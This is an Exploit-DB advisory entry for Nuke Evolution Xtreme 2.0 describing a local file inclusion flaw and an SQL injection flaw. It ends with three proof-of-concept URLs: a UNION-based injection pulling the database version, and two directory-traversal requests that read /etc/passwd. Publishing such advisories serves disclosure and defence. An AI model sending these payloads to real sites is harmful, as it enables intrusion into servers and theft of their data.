Nuke Evolution Xtreme 2.0 - Local File Inclusion / SQL Injection

EDB-ID:

35653

CVE:

N/A


Platform:

PHP

Published:

2011-04-22

source: http://www.securityfocus.com/bid/47552/info

Nuke Evolution Xtreme is prone to a local file-include vulnerability and an SQL-injection vulnerability.

An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process.

The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Nuke Evolution Xtreme 2.0 is vulnerable; other versions may also be affected. 


http://www.example.com/[path]/modules.php?name=Surveys&op=results&pollID=3+and+1=2+union+select+1,version(),3,4,5--
http://www.example.com/[path]/modules.php?name=News&file=../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/modules.php?name=Private_Messages&file=../../../../../../../../../../etc/passwd%00